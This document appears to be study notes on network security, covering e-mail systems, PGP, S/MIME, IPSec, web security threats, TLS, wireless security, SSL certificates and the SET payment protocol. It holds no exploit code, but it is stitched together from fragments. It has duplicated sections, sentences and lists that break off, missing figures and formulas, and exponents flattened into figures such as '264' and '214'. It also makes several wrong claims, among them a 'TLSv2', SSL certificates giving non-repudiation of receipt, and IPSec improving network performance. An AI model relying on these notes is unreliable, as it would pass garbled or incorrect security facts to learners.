1. Mailbox : It is a file on local hard drive to collect mails. Delivered mails are present in
this file. The user can read it delete it according to his/her requirement. To use e-mail
system each user must have a mailbox . Access to mailbox is only to owner of mailbox.
2. Spool file : This file contains mails that are to be sent. User agent appends outgoing
mails in this file using SMTP. MTA extracts pending mail from spool file for their
delivery. E-mail allows one name, an alias, to represent several different e-mail
addresses. It is known as mailing list, Whenever user have to sent a message, system
checks recipient’s name against alias database. If mailing list is present for defined
alias, separate messages, one for each entry in the list, must be prepared and handed to
MTA. If for defined alias, there is no such mailing list is present, name itself becomes
naming address and a single message is delivered to mail transfer entity.
Services provided by E-mail system :
Composition – The composition refer to process that creates messages and answers.
For composition any kind of text editor can be used.
Transfer – Transfer means sending procedure of mail i.e. from the sender to recipient.
Reporting – Reporting refers to confirmation for delivery of mail. It help user to check
whether their mail is delivered, lost or rejected.
Displaying – It refers to present mail in form that is understand by the user.
Disposition – This step concern with recipient that what will recipient do after
receiving mail i.e save mail, delete before reading or delete after reading.
PGP provides the confidentiality and authentication service that can be used for electronic
mail and file storage applications. The steps involved in PGP are Select the best available
cryptographic algorithms as building blocks. Integrate these algorithms into a general purpose
application that is independent of operating system and processor and that is based on a small
set of easy-touse commands. Make the package and its documentation, including the source
code, freely available via the internet, bulletin boards and commercial networks. Enter into an
agreement with a company to provide a fully compatible, low cost commercial version of
PGP.
PGP has grown explosively and is now widely used. A number of reasons can be cited for
this growth. It is available free worldwide in versions that run on a variety of platform. It is
based on algorithms that have survived extensive public review and are considered extremely
secure. e.g., RSA, DSS and Diffie Hellman for public key encryption It has a wide range of
applicability.
It was not developed by, nor it is controlled by, any governmental or standards organization.
Operational description The actual operation of PGP consists of five services:
1. Authentication
2. Confidentiality
3. Compression
4. E-mail compatibility
5. Segmentation.
1. Authentication: The sequence for authentication is as follows: The sender creates the
message SHA-1 is used to generate a 160-bit hash code of the message The hash code is
encrypted with RSA using the sender‟s private key and the result is pretended to the message
The receiver uses RSA with the sender‟s public key to decrypt and recover the hash code.
The receiver generates a new hash code for the message and compares it with the decrypted
hash code. If the two match, the message is accepted as authentic.
The sequence for confidentiality is as follows: The sender generates a message and a
random 128-bit number to be used as a session key for this message only.
The message is encrypted using CAST-128 with the session key. The session key is
encrypted with RSA, using the receiver‟s public key and is prepended to the message.
The receiver uses RSA with its private key to decrypt and recover the session key.
The session key is used to decrypt the message.
Confidentiality and authentication Here both services may be used for the same
message. First, a signature is generated for the plaintext message and prepended to the
message. Then the plaintext plus the signature is encrypted using CAST-128 and the
session key is encrypted using RSA.
3. Compression As a default, PGP compresses the message after applying the signature but
before encryption. This has the benefit of saving space for both e-mail transmission and for
file storage. The signature is generated before compression for two reasons
• It is preferable to sign an uncompressed message so that one can store only the
uncompressed message together with the signature for future verification. If one signed a
compressed document, then it would be necessary either to store a compressed version of the
message for later verification or to recompress the message when verification is required.
5. Segmentation and reassembly E-mail facilities often are restricted to a maximum length.
E.g., many of the facilities accessible through the internet impose a maximum length of
50,000 octets. Any message longer than that must be broken up into smaller segments, each
of which is mailed separately. To accommodate this restriction, PGP automatically
subdivides a message that is too large into segments that are small enough to send via e-mail.
The segmentation is done after all the other processing, including the radix-64 conversion. At
the receiving end, PGP must strip off all e-mail headers and reassemble the entire original
block before performing the other steps.
A means of generating unpredictable session keys is needed. It must allow a user to have
multiple public key/private key pairs.
Each PGP entity must maintain a file of its own public/private key pairs as well as a file of
public keys of correspondent.
a.Session key generation Each session key is associated with a single message and is used
only for the purpose of encryption and decryption of that message. Random 128-bit numbers
are generated using CAST-128 itself. The input to the random number generator consists of a
128-bit key and two 64-bit blocks that are treated as plaintext to be encrypted. Using cipher
feedback mode, the CAST-128 produces two 64-bit cipher text blocks, which are
concatenated to form the 128-bit session key. The plaintext input to CAST-128 is itself
derived from a stream of 128-bit randomized numbers.These numbers are based on the
keystroke input from the user.
b. Key identifiers If multiple public/private key pair are used, then how does the recipient
know which of the public keys was used to encrypt the session key? One simple solution
would be to transmit the public key with the message but, it is unnecessary wasteful of space.
Another solution would be to associate an identifier with each public key that is unique at
least within each user. The solution adopted by PGP is to assign a key ID to each public key
that is, with very high probability, unique within a user ID. The key ID associated with each
public key consists of its least significant 64 bits. i.e., the key ID of public key KUa is (KUa
mod 264).
Notation:
PGP message generation First consider message transmission and assume that the
message is to be both signed and encrypted. The sending PGP entity performs the
following steps
1. Signing the message
• PGP retrieves the sender‟s private key from the private key ring using user ID
as an index. If user ID was not provided, the first private key from the ring is
retrieved.
• PGP prompts the user for the passphrase (password) to recover the unencrypted
private key.
• The signature component of the message is constructed.
2. Encrypting the message
• PGP generates a session key and encrypts the message.
• PGP retrieves the recipient‟s public key from the public key ring using user ID
as index.
The receiving PGP entity performs the following steps:
• PGP retrieves the receiver‟s private key from the private key ring, using the
key ID field in the session key component of the message as an index.
• PGP prompts the user for the passphrase (password) to recover the
unencrypted private key.
• PGP then recovers the session key and decrypts the message.
• PGP retrieves the sender‟s public key from the public key ring, using the key ID
field in the signature key component of the message as an index.
• PGP recovers the transmitted message digest.
• PGP computes the message digest for the received message and compares it to
the transmitted message digest to authenticate.
S/MIME:
S/MIME (Secure/Multipurpose Internet Mail Extension) is a security enhancement to the
MIME Internet e-mail format standard, based on technology from RSA Data Security.
MIME is an extension to the RFC 822 framework that is intended to address some of the problems
and limitations of the use of SMTP (Simple Mail Transfer Protocol) or some other mail transfer
protocol and RFC 822 for electronic mail.
2. SMTP cannot transmit text data that includes national language characters because these
are represented by 8-bit codes with values of 128 decimal or higher, and SMTP is limited to
7-bit ASCII. 3. SMTP servers may reject mail message over a certain size.
4. SMTP gateways that translate between ASCII and the character code EBCDIC do not use a
consistent set of mappings, resulting in translation problems.
5. SMTP gateways to X.400 electronic mail networks cannot handle non textual data
included in X.400 messages. 6. Some SMTP implementations do not adhere completely to
the SMTP standards defined in RFC 821.
• Conversion of tab characters into multiple space characters MIME is intended to resolve
these problems in a manner that is compatible with existing RFC 822 implementations. The
specification is provided in RFCs 2045 through 2049.
OVERVIEW
1. Five new message header fields are defined, which may be included in an RFC 822 header.
These fields provide information about the body of the message.
2. A number of content formats are defined, thus standardizing representations that support
multimedia electronic mail.
3. Transfer encodings are defined that enable the conversion of any content format into a
form that is protected from alteration by the mail system. In this subsection, we introduce the
five message header fields.
The next two subsections deal with content formats and transfer encodings. T
• MIME-Version: Must have the parameter value 1.0. This field indicates that the message
conforms to RFCs 2045 and 2046.
• Content-Type: Describes the data contained in the body with sufficient detail
• Content-Description: A text description of the object with the body; this is useful when the
object is not readable (e.g., audio data). MIME Content Types There are seven different
major types of content and a total of 15 subtypes
Multipurpose Internet Mail Extensions:
Multipurpose Internet Mail Extension (MIME) is an extension to the RFC 5322 framework
that is intended to address some of the problems and limitations of the use of Simple Mail
Transfer Protocol (SMTP), defined in RFC 821, or some other mail transfer protocol and
RFC 5322 for electronic mail.
1. SMTP cannot transmit executable files or other binary objects. A number of schemes are in
use for converting binary files into a text form that can be used by SMTP mail systems,
including the popular UNIX UUencode/ UUdecode scheme. However, none of these is a
standard or even a de facto standard.
2. SMTP cannot transmit text data that includes national language characters, because these
are represented by 8-bit codes with values of 128 decimal or higher, and SMTP is limited to
7-bit ASCII. 3. SMTP servers may reject mail message over a certain size.
4. SMTP gateways that translate between ASCII and the character code EBCDIC do not use
a consistent set of mappings, resulting in translation problems.
5. SMTP gateways to X.400 electronic mail networks cannot handle nontextual data included
in X.400 messages.
6. Some SMTP implementations do not adhere completely to the SMTP standards defined in
RFC 821.
• Enveloped data: This consists of encrypted content of any type and encryptedcontent
encryption keys for one or more recipients.
• Signed data: A digital signature is formed by taking the message digest of the content to be
signed and then encrypting that with the private key of the signer. The content plus signature
are then encoded using base64 encoding. A signed data message can only be viewed by a
recipient with S/MIME capability.
• Clear-signed data: As with signed data, a digital signature of the content is formed.
However, in this case, only the digital signature is encoded using base64. As a result,
recipients without S/MIME capability can view the message content, although they cannot
verify the signature.
• Signed and enveloped data: Signed-only and encrypted-only entities may be nested, so that
encrypted data may be signed and signed data or clear-signed data may be encrypted.
Cryptographic Algorithms
• SHOULD: There may exist valid reasons in particular circumstances to ignore this feature
or function, but it is recommended that an implementation include the feature or function.
• Secure mailing lists: When a user sends a message to multiple recipients, a certain amount
of per-recipient processing is required, including the use of each recipient’s public key. The
user can be relieved of this work by employing the services of an S/MIME Mail List Agent
(MLA). An MLA can take a single incoming message, perform the recipient-specific
encryption for each recipient, and forward the message. The originator of a message need
only send the message to the MLA with encryption performed using the MLA’s public key.
IP SECURITY:
OVERVIEW OF IPSEC
IP Sec (Internet Protocol Security) is an Internet Engineering Task Force (IETF) standard
suite of protocols between two communication points across the IP network that provide
data authentication, integrity, and confidentiality. It also defines the encrypted, decrypted,
and authenticated packets. The protocols needed for secure key exchange and key
management are defined in it.
Applications of IPSec:
IPSec provides the capability to secure communications across a LAN, across private and
public WANs, and across the Internet.
Components of IP Security:
1. Encapsulating Security Payload (ESP)
2. Authentication Header (AH)
3. Internet Key Exchange (IKE)
1. Encapsulating Security Payload (ESP): It provides data integrity, encryption,
authentication, and anti-replay. It also provides authentication for payload.
2. Authentication Header (AH): It also provides data integrity, authentication, and anti-
replay and it does not provide encryption. The anti-replay protection protects against the
unauthorized transmission of packets. It does not protect data confidentiality.
IP Security Architecture
IPSec (IP Security) architecture uses two protocols to secure the traffic or data flow. These
protocols are ESP (Encapsulation Security Payload) and AH (Authentication Header).
IPSec Architecture includes protocols, algorithms, DOI, and Key Management. All these
components are very important in order to provide the three main services:
Confidentiality
Authenticity
Integrity
Working on IP Security
The host checks if the packet should be transmitted using IPsec or not. This packet
traffic triggers the security policy for itself. This is done when the system sending the
packet applies appropriate encryption. The incoming packets are also checked by the
host that they are encrypted properly or not.
Then IKE Phase 1 starts in which the 2 hosts( using IPsec ) authenticate themselves to
each other to start a secure channel. It has 2 modes. The Main mode provides greater
security and the Aggressive mode which enables the host to establish an IPsec circuit
more quickly.
The channel created in the last step is then used to securely negotiate the way the IP
circuit will encrypt data across the IP circuit.
Now, the IKE Phase 2 is conducted over the secure channel in which the two hosts
negotiate the type of cryptographic algorithms to use on the session and agree on secret
keying material to be used with those algorithms.
Then the data is exchanged across the newly created IPsec encrypted tunnel. These
packets are encrypted and decrypted by the hosts using IPsec SAs.
When the communication between the hosts is completed or the session times out then
the IPsec tunnel is terminated by discarding the keys by both hosts.
Features of IPSec
1. Authentication: IPSec provides authentication of IP packets using digital signatures or
shared secrets. This helps ensure that the packets are not tampered with or forged.
2. Confidentiality: IPSec provides confidentiality by encrypting IP packets, preventing
eavesdropping on the network traffic.
3. Integrity: IPSec provides integrity by ensuring that IP packets have not been modified
or corrupted during transmission.
4. Key management: IPSec provides key management services, including key exchange
and key revocation, to ensure that cryptographic keys are securely managed.
5. Tunneling: IPSec supports tunneling, allowing IP packets to be encapsulated within
another protocol, such as GRE (Generic Routing Encapsulation) or L2TP (Layer 2
Tunneling Protocol).
6. Flexibility: IPSec can be configured to provide security for a wide range of network
topologies, including point-to-point, site-to-site, and remote access connections.
7. Interoperability: IPSec is an open standard protocol, which means that it is supported
by a wide range of vendors and can be used in heterogeneous environments.
Advantages of IPSec
1. Strong security: IPSec provides strong cryptographic security services that help protect
sensitive data and ensure network privacy and integrity.
2. Wide compatibility: IPSec is an open standard protocol that is widely supported by
vendors and can be used in heterogeneous environments.
3. Flexibility: IPSec can be configured to provide security for a wide range of network
topologies, including point-to-point, site-to-site, and remote access connections.
4. Scalability: IPSec can be used to secure large-scale networks and can be scaled up or
down as needed.
5. Improved network performance: IPSec can help improve network performance by
reducing network congestion and improving network efficiency.
Disadvantages of IPSec
1. Configuration complexity: IPSec can be complex to configure and requires specialized
knowledge and skills.
2. Compatibility issues: IPSec can have compatibility issues with some network devices
and applications, which can lead to interoperability problems.
3. Performance impact: IPSec can impact network performance due to the overhead of
encryption and decryption of IP packets.
4. Key management: IPSec requires effective key management to ensure the security of
the cryptographic keys used for encryption and authentication.
5. Limited protection: IPSec only provides protection for IP traffic, and other protocols
such as ICMP, DNS, and routing protocols may still be vulnerable to attacks.
– This includes higher level protocols and ports. (NATs and firewalls may need this
information).
• ESP header is actually a header plus a trailer as it “surrounds” the packet data
– Confidentiality
– Connectionless integrity
– Anti-replay service
– SPI
– Sequence Number
– Padding length
– Next header
• In tunnel mode would be set to 4
– Connectionless integrity
Payload Length: length (in 32 bit words) of the AH Header minus 2 (note that it is
actually the AH header length, instead of payload length)
Authentication Data: Integrity check value (ICV) over most of the packet.
– IP Header: TOS, flags, frag offset, TTL, header checksum, (Note: covers pkt len
modified value)
• IPSec Header
• Tunnel Mode vs. Transport Mode identified by the next header type in the IPSec Header
(also true of ESP)
– change of (private) source address, for example, at a NAT box does not allow re-
computation of the HMAC by the destination
Security Associations:
An IPSec protected connection is called a security association
• The SPI used in identifying the SA is normally chosen by the receiving system (destination)
• Basic Processing
– for outbound packets, a packet’s selector is used to determine the processing to be applied
to the packet
– More complex than for inbound where the received SPI, destination address and protocol
type uniquely point to an SA.
• Destination IP address
• Source IP address
• Name
• RFC 4301
KEY MANAGEMENT: The key management portion of IPSec involves the
determination and distribution of secret keys.
Manual: A system administrator manually configures each system with its own keys
and with the keys of other communicating systems. This is practical for small, relatively
static environments.
Automated: An automated system enables the on-demand creation of keys for SAs
and facilitates the use of keys in a large distributed system with an evolving configuration.
The default automated key management protocol for IPSec is referred to as ISAKMP/Oakley
and consists of the following elements:
Web Security:
Web security refers to protecting networks and computer systems from damage to or the theft
of software, hardware, or data. It includes protecting computer systems from misdirecting or
disrupting the services they are designed to provide.
A collection of application:
– Multimedia
– Instant messaging
• Many applications:
The World Wide Web is fundamentally a client/server application running over the Internet
and TCP/IP intranets.
Security Consideration:
Updated Software: You need to always update your software. Hackers may be aware
of vulnerabilities in certain software, which are sometimes caused by bugs and can be
used to damage your computer system and steal personal data. Older versions of
software can become a gateway for hackers to enter your network. Software makers
soon become aware of these vulnerabilities and will fix vulnerable or exposed areas.
That’s why It is mandatory to keep your software updated, It plays an important role in
keeping your personal data secure.
Beware of SQL Injection: SQL Injection is an attempt to manipulate your data or your
database by inserting a rough code into your query. For e.g. somebody can send a query
to your website and this query can be a rough code while it gets executed it can be used
to manipulate your database such as change tables, modify or delete data or it can
retrieve important information also so, one should be aware of the SQL injection attack.
Cross-Site Scripting (XSS): XSS allows the attackers to insert client-side script into
web pages. E.g. Submission of forms. It is a term used to describe a class of attacks that
allow an attacker to inject client-side scripts into other users’ browsers through a
website. As the injected code enters the browser from the site, the code is reliable and
can do things like sending the user’s site authorization cookie to the attacker.
Error Messages: You need to be very careful about error messages which are
generated to give the information to the users while users access the website and some
error messages are generated due to one or another reason and you should be very
careful while providing the information to the users. For e.g. login attempt – If the user
fails to login the error message should not let the user know which field is incorrect:
Username or Password.
Data Validation: Data validation is the proper testing of any input supplied by the user
or application. It prevents improperly created data from entering the information
system. Validation of data should be performed on both server-side and client-side. If
we perform data validation on both sides that will give us the authentication. Data
validation should occur when data is received from an outside party, especially if the
data is from untrusted sources.
Password: Password provides the first line of defense against unauthorized access to
your device and personal information. It is necessary to use a strong password. Hackers
in many cases use sophisticated software that uses brute force to crack passwords.
Passwords must be complex to protect against brute force. It is good to enforce
password requirements such as a minimum of eight characters long must including
uppercase letters, lowercase letters, special characters, and numerals.
Web Security Threats:
Two types of attacks are:
Passive attacks include eavesdropping on network traffic between browser and server and
gaining access to information on a Web site that is supposed to be restricted.
Active attacks include impersonating another user, altering messages in transit between
client and server, and altering information on a Web site.
Security Threats:
A Threat is nothing but a possible event that can damage and harm an information system.
Security Threat is defined as a risk that which, can potentially harm Computer systems &
organizations. Whenever an Individual or an Organization creates a website, they are
vulnerable to security attacks.
Security attacks are mainly aimed at stealing altering or destroying a piece of personal and
confidential information, stealing the hard drive space, and illegally accessing passwords.
So whenever the website you created is vulnerable to security attacks then the attacks are
going to steal your data alter your data destroy your personal information see your
confidential information and also it accessing your password.
Transport Layer Security:
One of the most widely used security services is Transport Layer Security (TSL); the current
version is Version 1.2, defined in RFC 5246. TLS is an Internet standard that evolved from a
commercial protocol known as Secure Sockets Layer (SSL). Although SSL implementations
are still around, it has been deprecated by IETF and is disabled by most corporations offering
TLS software. TLS is a generalpurpose service implemented as a set of protocols that rely on
TCP. At this level, there are two implementation choices. For full generality, TLS could be
provided as part of the underlying protocol suite and therefore be transparent to applications.
Alternatively, TLS can be embedded in specific packages. For example, most browsers come
equipped with TLS, and most Web servers have implemented the protocol.
TLS Architecture :
TLS is designed to make use of TCP to provide a reliable end-to-end secure service.
The TLS Record Protocol provides basic security services to various higherlayer protocols. In
particular, the Hypertext Transfer Protocol (HTTP), which provides the transfer service for
Web client/server interaction, can operate on top of TLS.
These TLSspecific protocols are used in the management of TLS exchanges and are
examined later in this section. A fourth protocol, the Heartbeat Protocol, is defined in a
separate RFC and is also discussed subsequently in this section. Two important TLS concepts
are the TLS session and the TLS connection,
■ Connection: A connection is a transport (in the OSI layering model definition) that
provides a suitable type of service. For TLS, such connections are peer-topeer relationships.
The connections are transient. Every connection is associated with one session.
■ Session: A TLS session is an association between a client and a server. Sessions are
created by the Handshake Protocol. Sessions define a set of cryptographic security
parameters, which can be shared among multiple connections. Sessions are used to avoid the
expensive negotiation of new security parameters for each connection.
Between any pair of parties (applications such as HTTP on client and server), there may be
multiple secure connections. In theory, there may also be multiple simultaneous sessions
between parties, but this feature is not used in practice. There are a number of states
associated with each session. Once a session is established, there is a current operating state
for both read and write (i.e., receive and send). In addition, during the Handshake Protocol,
pending read and write states are created. Upon successful conclusion of the Handshake
Protocol, the pending states become the current states.
A session state is defined by the following parameters:
■ Session identifier: An arbitrary byte sequence chosen by the server to identify an active or
resumable session state.
■ Peer certificate: An X509.v3 certificate of the peer. This element of the state may be null
■ Cipher spec: Specifies the bulk data encryption algorithm (such as null, AES, etc.) and a
hash algorithm (such as MD5 or SHA-1) used for MAC calculation. It also defines
cryptographic attributes such as the hash_size.
■ Master secret: 48-byte secret shared between the client and server.
■ Is resumable: A flag indicating whether the session can be used to initiate new
connections. A connection state is defined by the following parameters:
■ Server and client random: Byte sequences that are chosen by the server and client for each
connection.
■ Server write MAC secret: The secret key used in MAC operations on data sent by the
server.
■ Client write MAC secret: The symmetric key used in MAC operations on data sent by
the client.
■ Server write key: The symmetric encryption key for data encrypted by the server and
decrypted by the client.
■ Client write key: The symmetric encryption key for data encrypted by the client and
decrypted by the server.
■ Initialization vectors: When a block cipher in CBC mode is used, an initialization vector
(IV) is maintained for each key. This field is first initialized by the TLS Handshake Protocol.
Thereafter, the final ciphertext block from each record is preserved for use as the IV with the
following record.
■ Sequence numbers: Each party maintains separate sequence numbers for transmitted and
received messages for each connection. When a party sends or receives a “change cipher spec
message,” the appropriate sequence number is set to zero. Sequence numbers may not exceed
264 - 1. TLS Record Protocol The TLS Record Protocol provides two services for TLS
connections:
■ Confidentiality: The Handshake Protocol defines a shared secret key that is used for
conventional encryption of TLS payloads.
■ Message Integrity: The Handshake Protocol also defines a shared secret key that is used to
form a message authentication code (MAC).
Figure 17.3 indicates the overall operation of the TLS Record Protocol. The Record Protocol
takes an application message to be transmitted, fragments the data into manageable blocks,
optionally compresses the data, applies a MAC, encrypts, adds a header, and transmits the
resulting unit in a TCP segment. Received data are decrypted, verified, decompressed, and
reassembled before being delivered to higher-level users. The first step is fragmentation.
Each upper-layer message is fragmented into blocks of 214 bytes (16,384 bytes) or less.
Next, compression is optionally applied. Compression must be lossless and may not increase
the content length by more than
Where
K+ = secret key padded with zeros on the left so that the result is equal to the block length of
the hash code (for MD5 and SHA-1, block length = 512 bits)
opad = 01011100 (5C in hexadecimal) repeated 64 times (512 bits) For TLS, the MAC
calculation encompasses the fields indicated in the following expression:
HMAC_hash(MAC_write_secret, seq_num ‘ TLSCompressed.type ‘ TLSCompressed
.version ‘ TLS Compressed.
length ‘ TLSCompressed.fragment) The MAC calculation covers all of the fields XXX, plus
the field TLSCompressed.version, which is the version of the protocol being employed. Next,
the compressed message plus the MAC are encrypted using symmetric encryption.
Encryption may not increase the content length by more than 1024 bytes,
so that the total length may not exceed 214 + 2048. The following encryption algorithms are
permitted:
For stream encryption, the compressed message plus the MAC are encrypted. Note that the
MAC is computed before encryption takes place and that the MAC is then encrypted along
with the plaintext or compressed plaintext. For block encryption, padding may be added after
the MAC prior to encryption. The padding is in the form of a number of padding bytes
followed by a onebyte indication of the length of the padding. The padding can be any
amount that results in a total that is a multiple of the cipher’s block length, up to a maximum
of 255 bytes. For example, if the cipher block length is 16 bytes (e.g., AES) and if the
plaintext (or compressed text if compression is used) plus MAC plus padding length byte is
79 bytes long, then the padding length (in bytes) can be 1, 17, 33, and so on, up to 161. At a
padding length of 161, the total length is 79 + 161 = 240. A variable padding length may be
used to frustrate attacks based on an analysis of the lengths of exchanged messages.
The final step of TLS Record Protocol processing is to prepend a header consisting of the
following fields:
■ Content Type (8 bits): The higher-layer protocol used to process the enclosed fragment.
■ Major Version (8 bits): Indicates major version of TLS in use. For TLSv2, the value is 3.
■ Minor Version (8 bits): Indicates minor version in use. For TLSv2, the value is 1.
■ Compressed Length (16 bits): The length in bytes of the plaintext fragment (or compressed
fragment if compression is used). The maximum value is 214 + 2048. The content types that
have been defined are change_cipher_spec, alert, handshake, and application_data. The first
three are the TLSspecific protocols, discussed next. Note that no distinction is made among
the various applications (e.g., HTTP) that might use TLS; the content of the data created by
such applications is opaque to TLS.
Handshake Protocol :
The most complex part of TLS is the Handshake Protocol. This protocol allows the server
and client to authenticate each other and to negotiate an encryption and MAC algorithm and
cryptographic keys to be used to protect data sent in a TLS record. The Handshake Protocol
is used before any application data is transmitted. The Handshake Protocol consists of a
series of messages exchanged by client and server.
All of these have the format shown in Figure 17.5c . Each message has three fields:
■ Type (1 byte): Indicates one of 10 messages. Table 17.2 lists the defined message types. ■
Length (3 bytes): The length of the message in bytes.
■ Content (# 0 bytes): The parameters associated with this message; these are listed in Table
17.2. Figure 17.6 shows the initial exchange needed to establish a logical connection between
client and server. The exchange can be viewed as having four phases.
Phase 1 initiates a logical connection and establishes the security capabilities that will be
associated with it.
The exchange is initiated by the client, which sends a client_hello message with the
following parameters:
■ Session ID: A variable-length session identifier. A nonzero value indicates that the client
wishes to update the parameters of an existing connection or to create a new connection on
this session. A zero value indicates that the client wishes to establish a new connection on a
new session.
WIRELESS SECURITY :
Wireless networks, and the wireless devices that use them, introduce a host of security
problems over and above those found in wired networks. Some of the key factors
contributing to the higher security risk of wireless networks compared to wired networks
include the following [MA10]:
■ Resources: Some wireless devices, such as smartphones and tablets, have sophisticated
operating systems but limited memory and processing resources with which to counter
threats, including denial of service and malware.
■ Accessibility: Some wireless devices, such as sensors and robots, may be left unattended
in remote and/or hostile locations. This greatly increases their vulnerability to physical
attacks.
In simple terms, the wireless environment consists of three components that provide point of
attack (Figure 18.1). The wireless client can be a cell phone, a Wi-Fi–enabled laptop or
tablet, a wireless sensor, a Bluetooth device, and so on. The wireless access point provides a
connection to the network or service. Examples of access points are cell towers, Wi-Fi
hotspots, and wireless access points to wired local or wide area networks. The transmission
medium, which carries the radio waves for data transfer, is also a source of vulnerability.
Wireless Network Threats [CHOI08] lists the following security threats to wireless networks:
■ Accidental association: Company wireless LANs or wireless access points to wired LANs
in close proximity (e.g., in the same or neighboring buildings) may create overlapping
transmission ranges. A user intending to connect to one LAN may unintentionally lock on to
a wireless access point from a neighboring network. Although the security breach is
accidental, it nevertheless exposes resources of one LAN to the accidental user.
■ Ad hoc networks: These are peer-to-peer networks between wireless computers with no
access point between them. Such networks can pose a security threat due to a lack of a central
point of control.
■ Man-in-the middle attacks: This type of attack is described in Chapter 10 in the context of
the Diffie–Hellman key exchange protocol. In a broader sense, this attack involves
persuading a user and an access point to believe that they are talking to each other when in
fact the communication is going through an intermediate attacking device. Wireless networks
are particularly vulnerable to such attacks
Denial of service (DoS): This type of attack is discussed in detail in Chapter 21. In the
context of a wireless network, a DoS attack occurs when an attacker continually bombards a
wireless access point or some other accessible wireless port with various protocol messages
designed to consume system resources. The wireless environment lends itself to this type of
attack, because it is so easy for the attacker to direct multiple wireless messages at the target.
■ Network injection: A network injection attack targets wireless access points that are
exposed to nonfiltered network traffic, such as routing protocol messages or network
management messages. An example of such an attack is one in which bogus reconfiguration
commands are used to affect routers and switches to degrade network performance. Wireless
Security Measures Following [CHOI08], we can group wireless security measures into those
dealing with wireless transmissions, wireless access points, and wireless networks (consisting
of wireless routers and endpoints). SECURING WIRELESS TRANSMISSIONS The
principal threats to wireless transmission are eavesdropping, altering or inserting messages,
and disruption.
The main threat involving wireless access points is unauthorized access to the network. The
principal approach for preventing such access is the IEEE 802.1X standard for port-based
network access control. The standard provides an authentication mechanism for devices
wishing to attach to a LAN or wireless network. The use of 802.1X can prevent rogue access
points and other unauthorized devices from becoming insecure backdoors. Section 16.3
provides an introduction to 802.1X
1. Use encryption. Wireless routers are typically equipped with built-in encryption
mechanisms for router-to-router traffic
2. Use antivirus and antispyware software, and a firewall. These facilities should be enabled
on all wireless network endpoints.
3. Turn off identifier broadcasting. Wireless routers are typically configured to broadcast
an identifying signal so that any device within range can learn of the router’s existence. If
a network is configured so that authorized devices know the identity of routers, this
capability can be disabled, so as to thwart attackers.
4. Change the identifier on your router from the default. Again, this measure thwarts
attackers who will attempt to gain access to a wireless network using default router
identifiers.
5. Change your router’s pre-set password for administration. This is another prudent step.
6. Allow only specific computers to access your wireless network. A router can be
configured to only communicate with approved MAC addresses. Of course, MAC
addresses can be spoofed, so this is just one element of a security strategy.
Handshake Protocol:
Handshake Protocol is used to establish sessions. This protocol allows the client and server to
authenticate each other by sending a series of messages to each other. Handshake protocol
uses four phases to complete its cycle.
Phase-1: In Phase-1 both Client and Server send hello-packets to each other. In this IP
session, cipher suite and protocol version are exchanged for security purposes.
Phase-2: Server sends his certificate and Server-key-exchange. The server end phase-2 by
sending the Server-hello-end packet.
Phase-3: In this phase, Client replies to the server by sending his certificate and Client-
exchange-key.
Phase-4: In Phase-4 Change-cipher suite occurs and after this the Handshake Protocol
ends.
Change-cipher Protocol:
This protocol uses the SSL record protocol. Unless Handshake Protocol is completed, the
SSL record Output will be in a pending state. After the handshake protocol, the Pending state
is converted into the current state.
Change-cipher protocol consists of a single message which is 1 byte in length and can have
only one value. This protocol’s purpose is to cause the pending state to be copied into the
current state.
Alert Protocol:
This protocol is used to convey SSL-related alerts to the peer entity. Each message in this
protocol contains 2 bytes.
SSL (Secure Sockets Layer) certificate is a digital certificate used to secure and verify the
identity of a website or an online service. The certificate is issued by a trusted third-party
called a Certificate Authority (CA), who verifies the identity of the website or service before
issuing the certificate.
The SSL certificate has several important characteristics that make it a reliable solution for
securing online transactions:
1. Encryption: The SSL certificate uses encryption algorithms to secure the communication
between the website or service and its users. This ensures that the sensitive information,
such as login credentials and credit card information, is protected from being intercepted
and read by unauthorized parties.
2. Authentication: The SSL certificate verifies the identity of the website or service,
ensuring that users are communicating with the intended party and not with an impostor.
This provides assurance to users that their information is being transmitted to a trusted
entity.
3. Integrity: The SSL certificate uses message authentication codes (MACs) to detect any
tampering with the data during transmission. This ensures that the data being transmitted
is not modified in any way, preserving its integrity.
4. Non-repudiation: SSL certificates provide non-repudiation of data, meaning that the
recipient of the data cannot deny having received it. This is important in situations where
the authenticity of the information needs to be established, such as in e-commerce
transactions.
5. Public-key cryptography: SSL certificates use public-key cryptography for secure key
exchange between the client and server. This allows the client and server to securely
exchange encryption keys, ensuring that the encrypted information can only be decrypted
by the intended recipient.
6. Session management: SSL certificates allow for the management of secure sessions,
allowing for the resumption of secure sessions after interruption. This helps to reduce the
overhead of establishing a new secure connection each time a user accesses a website or
service.
7. Certificates issued by trusted CAs: SSL certificates are issued by trusted CAs, who are
responsible for verifying the identity of the website or service before issuing the
certificate. This provides a high level of trust and assurance to users that the website or
service they are communicating with is authentic and trustworthy.
Requirements in SET: The SET protocol has some requirements to meet, some of the
important requirements are:
It has to provide mutual authentication i.e., customer (or cardholder) authentication by
confirming if the customer is an intended user or not, and merchant authentication.
It has to keep the PI (Payment Information) and OI (Order Information) confidential by
appropriate encryptions.
It has to be resistive against message modifications i.e., no changes should be allowed in
the content being transmitted.
SET also needs to provide interoperability and make use of the best security mechanisms.
Participants in SET: In the general scenario of online transactions, SET includes similar
participants:
1. Cardholder – customer
2. Issuer – customer financial institution
3. Merchant
4. Acquirer – Merchant financial
5. Certificate authority – Authority that follows certain standards and issues certificates(like
X.509V3) to all other participants.
SET functionalities:
Provide Authentication
Merchant Authentication – To prevent theft, SET allows customers to check
previous relationships between merchants and financial institutions. Standard
X.509V3 certificates are used for this verification.
Customer / Cardholder Authentication – SET checks if the use of a credit card
is done by an authorized user or not using X.509V3 certificates.
Provide Message Confidentiality: Confidentiality refers to preventing unintended people
from reading the message being transferred. SET implements confidentiality by using
encryption techniques. Traditionally DES is used for encryption purposes.
Provide Message Integrity: SET doesn’t allow message modification with the help of
signatures. Messages are protected against unauthorized modification using RSA digital
signatures with SHA-1 and some using HMAC with SHA-1,
Dual Signature: The dual signature is a concept introduced with SET, which aims at
connecting two information pieces meant for two different receivers :
Order Information (OI) for merchant
Payment Information (PI) for bank
You might think sending them separately is an easy and more secure way, but sending them
in a connected form resolves any future dispute possible. Here is the generation of dual
signature:
Purchase Request Generation: The process of purchase request generation requires three
inputs:
Payment Information (PI)
Dual Signature
Order Information Message Digest (OIMD)
The purchase request is generated as follows:
Purchase Request Validation on Merchant Side: The Merchant verifies by comparing
POMD generated through PIMD hashing with POMD generated through decryption of Dual
Signature as follows:
Since we used Customer’s private key in encryption here we use KUC which is the public
key of the customer or cardholder for decryption ‘D’.
Payment Authorization and Payment Capture: Payment authorization as the name
suggests is the authorization of payment information by the merchant which ensures payment
